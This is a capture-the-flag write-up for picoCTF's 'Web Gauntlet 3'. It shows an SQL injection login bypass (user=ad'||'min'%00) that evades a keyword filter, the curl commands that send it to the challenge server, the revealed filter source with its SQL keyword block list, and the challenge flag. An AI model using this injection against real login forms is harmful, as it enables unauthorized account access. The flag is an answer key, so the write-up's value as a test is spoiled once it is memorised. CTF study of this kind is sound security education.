# Web Gauntlet 3

## Problem

> Last time, I promise! Only 25 characters this time. Log in as admin Site: <http://mercury.picoctf.net:32946/> Filter: <http://mercury.picoctf.net:32946/filter.php>

## Solution

1. The solution to this challenge is completely identical to my solution to [Web Gauntlet 2](https://picoctf2021.haydenhousen.com/web-exploitation/web-gauntlet-2).
2. The solution query is `user=ad'||'min'%00` and it can be sent using cURL like so: `curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -` The flag can be retrieved using this command: `curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF`. See [Web Gauntlet 2](https://picoctf2021.haydenhousen.com/web-exploitation/web-gauntlet-2) for more information.
3. The code for the filter and the flag are shown in `/filter.php` when the login is bypassed:

   ```php
   <?php
   session_start();

   if (!isset($_SESSION["winner3"])) {
       $_SESSION["winner3"] = 0;
   }
   $win = $_SESSION["winner3"];
   $view = ($_SERVER["PHP_SELF"] == "/filter.php");

   if ($win === 0) {
       $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
       if ($view) {
           echo "Filters: ".implode(" ", $filter)."<br/>";
       }
   } else if ($win === 1) {
       if ($view) {
           highlight_file("filter.php");
       }
       $_SESSION["winner3"] = 0;        // <- Don't refresh!
   } else {
       $_SESSION["winner3"] = 0;
   }

   // picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
   ?>
   ```

### Flag

`picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}`